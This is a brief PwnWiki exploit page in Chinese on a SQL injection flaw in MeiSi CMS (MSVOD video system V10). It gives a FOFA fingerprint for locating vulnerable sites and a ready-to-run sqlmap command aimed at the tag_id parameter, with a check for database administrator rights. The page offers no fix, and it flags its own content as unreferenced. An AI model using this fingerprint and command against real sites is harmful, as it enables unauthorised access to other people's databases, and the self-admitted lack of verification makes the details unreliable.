魅思CMS(MSVOD視頻系統 V10) SQL注入漏洞

From PwnWiki
Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。


FOFA

body="<script type=text/javascript src=/tpl/default/static/js/jquery-3.2.1.min.js></script>"

SqlMap

sqlmap -u "http://URL/video/lists.html?orderCode=lastTime&tag_id=0&sub_cid=0&cid=0"  --technique B -p tag_id --risk 3 --random-agent --is-dba
Retrieved from "https://pwnwiki.com/index.php?title=魅思CMS(MSVOD視頻系統_V10)_SQL注入漏洞&oldid=2048"